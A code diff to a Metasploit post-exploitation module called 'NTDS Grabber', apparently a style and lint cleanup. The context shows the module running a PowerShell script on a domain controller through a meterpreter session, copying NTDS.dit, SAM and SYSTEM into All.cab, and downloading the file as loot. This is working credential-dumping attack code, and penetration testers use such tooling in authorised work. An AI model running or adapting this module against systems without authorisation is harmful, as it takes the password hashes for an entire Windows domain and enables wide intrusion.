@@ -15,14 +15,21 @@ class MetasploitModule < Msf::Post
       update_info(
         info,
         'Name' => 'NTDS Grabber',
-        'Description' => %q(This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.
-                            It compresses all these files in a cabinet file called All.cab.),
+        'Description' => %q{
+          This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.
+          It compresses all these files in a cabinet file called All.cab.
+        },
         'License' => MSF_LICENSE,
         'Author' => ['Koen Riepe (koen.riepe@fox-it.com)'],
         'References' => [''],
         'Platform' => [ 'win' ],
         'Arch' => [ 'x86', 'x64' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -40,8 +47,7 @@ class MetasploitModule < Msf::Post
       [
         OptBool.new('DOWNLOAD', [ true, 'Immediately download the All.cab file', true ]),
         OptBool.new('CLEANUP', [ true, 'Remove the All.cab file at the end of module execution', true ])
-      ],
-      self.class
+      ]
     )
   end
 
@@ -58,7 +64,7 @@ class MetasploitModule < Msf::Post
   end
 
   def check_32_on_64
-    apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
+    apicall = session.railgun.kernel32.IsWow64Process(-1, 4)['Wow64Process']
     # railgun returns '\x00\x00\x00\x00' if the meterpreter process is 64bits.
     if apicall == "\x00\x00\x00\x00"
       migrate = false
@@ -69,8 +75,8 @@ class MetasploitModule < Msf::Post
   end
 
   def get_windows_loc
-    apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
-    windir = apicall.split(":")[0]
+    apicall = session.railgun.kernel32.GetEnvironmentVariableA('Windir', 255, 255)['lpBuffer']
+    windir = apicall.split(':')[0]
     return windir
   end
 
@@ -119,19 +125,19 @@ class MetasploitModule < Msf::Post
       print_good('The meterpreter is the same architecture as the OS!')
     end
 
-    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "NTDSgrab.ps1"))
+    base_script = File.read(File.join(Msf::Config.data_directory, 'post', 'powershell', 'NTDSgrab.ps1'))
     execute_script(base_script)
-    print_status('Powershell Script executed')
+    print_status('PowerShell script executed')
     cabcount = 0
 
     while cabcount < 2
-      if task_running("makecab.exe")
+      if task_running('makecab.exe')
         cabcount += 1
         while cabcount < 2
           print_status('Creating All.cab')
-          if not task_running("makecab.exe")
+          if !task_running('makecab.exe')
             cabcount += 1
-            while not file_exist?("All.cab")
+            until file_exist?('All.cab')
               sleep(1)
               print_status('Waiting for All.cab')
             end
@@ -145,7 +151,7 @@ class MetasploitModule < Msf::Post
 
     if downloadflag
       print_status('Downloading All.cab')
-      p1 = store_loot('Cabinet File', 'application/cab', session, read_file("All.cab"), 'All.cab', 'Cabinet file containing SAM, SYSTEM and NTDS.dit')
+      p1 = store_loot('Cabinet File', 'application/cab', session, read_file('All.cab'), 'All.cab', 'Cabinet file containing SAM, SYSTEM and NTDS.dit')
       print_good("All.cab saved in: #{p1}")
     end
 
@@ -153,10 +159,10 @@ class MetasploitModule < Msf::Post
       print_status('Removing All.cab')
       begin
         file_rm('All.cab')
-      rescue
+      rescue StandardError
         print_error('Problem with removing All.cab. Manually check if it\'s still there.')
       end
-      if not file_exist?("All.cab")
+      if !file_exist?('All.cab')
         print_good('All.cab Removed')
       else
         print_error('All.cab was not removed')
